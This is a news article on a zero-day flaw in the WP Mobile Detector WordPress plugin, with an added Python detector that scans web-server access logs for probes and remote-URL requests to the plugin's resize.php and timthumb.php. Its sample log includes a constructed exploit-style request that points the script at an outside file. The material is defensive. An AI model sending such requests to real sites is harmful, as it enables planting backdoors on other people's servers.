WordPress Plugin Zero-Day Flaw Affects Over 10,000 Websites Vulnerable to Exploit


WordPress, the most widely used Content Management System (CMS), is most often compromised through flaws in its plugins. A zero-day flaw in a WordPress plugin was recently detected, and over 10,000 websites running that plugin are estimated to be affected and vulnerable to exploitation.


Zero-Day Flaw in WordPress Plugin

Security researchers found a zero-day flaw in WP Mobile Detector, a WordPress plugin that automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme.

The zero-day flaw was first disclosed by the Plugin Vulnerabilities team on May 31, who suspected that over 10,000 websites may be affected by the flaw and vulnerable to exploitation.

The security researchers became aware of a potential problem after receiving a HEAD request for a WP Mobile Detector file, blog/wp-content/plugins/wp-mobile-detector/resize.php, on a CMS domain that did not have the plugin installed.

The team investigated further and realized it was most likely that “someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin.”

According to Sucuri, “the vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php, inside the plugin directory with the backdoor URL.”
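The two observations above, a HEAD probe for resize.php on a site that does not run the plugin and a request to resize.php or timthumb.php carrying a remote URL, are exactly what a site owner can look for in web-server access logs. The following detector is an added example written for this page; it is not code from the article, from Sucuri, or from the plugin. It assumes Common Log Format lines, that requests arriving as HEAD for the plugin files are probes, and that a query-string value that is itself a URL is what the quoted description calls the "backdoor URL" (the parameter name `src` in the constructed sample lines is an assumption; the detector does not depend on it).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Plugin files named in the report. The path prefix in front of
# /wp-content/ (here "/blog") varies per site, so matching is on the suffix.
WATCHED_FILES = (
    "/wp-content/plugins/wp-mobile-detector/resize.php",
    "/wp-content/plugins/wp-mobile-detector/timthumb.php",
)

# Common Log Format: host ident user [time] "METHOD TARGET PROTO" status size
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: any query value that is itself a URL is treated as an attempt
# to make the script fetch remote content.
_REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Parse one CLF access-log line into a dict, or None if it does not match."""
    m = _CLF.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def classify(entry):
    """Label one parsed entry: 'probe', 'remote-url-request',
    'plugin-file-access', or None when the request is not for the plugin."""
    if not any(entry["path"].endswith(f) for f in WATCHED_FILES):
        return None
    if entry["method"] == "HEAD":
        # Existence check of the kind the researchers saw before exploitation.
        return "probe"
    for values in entry["query"].values():
        if any(_REMOTE_URL.match(v) for v in values):
            return "remote-url-request"
    # Any other hit on the plugin's image scripts is worth a look, but not
    # necessarily hostile (the plugin itself calls them for local images).
    return "plugin-file-access"


def scan(lines):
    """Return (ip, method, path, label) for every line that touches the plugin."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["ip"], entry["method"], entry["path"], label))
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/May/2016:10:01:02 +0000] "HEAD /blog/wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1" 200 0',
    '203.0.113.5 - - [31/May/2016:10:01:05 +0000] "GET /blog/wp-content/plugins/wp-mobile-detector/resize.php?src=http://203.0.113.77/x.txt HTTP/1.1" 200 512',
    '198.51.100.9 - - [31/May/2016:10:02:00 +0000] "GET /blog/wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/a.jpg HTTP/1.1" 200 4096',
    '198.51.100.9 - - [31/May/2016:10:02:01 +0000] "GET /blog/index.php HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for ip, method, path, label in scan(SAMPLE_LOG):
        print(f"{label:20} {ip:15} {method:5} {path}")
```

On the sample lines the scan yields a probe, a remote-URL request from the same address, and one ordinary local-image request; the last line is ignored. The same HEAD-then-GET pair on a site that does not have the plugin at all is the signal the researchers started from, so the detector is useful on any WordPress host, not only on those running WP Mobile Detector.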

The team behind WP Mobile Detector was informed of the zero-day flaw on 29 May, and the wordpress.org Plugin Directory was notified two days later, leading to the temporary removal of the plugin.

On 31 May, the plugin's developers patched the issue and the plugin was restored to the directory. Users should update to version 3.6 or 3.7; neither version is vulnerable to attacks exploiting the flaw.
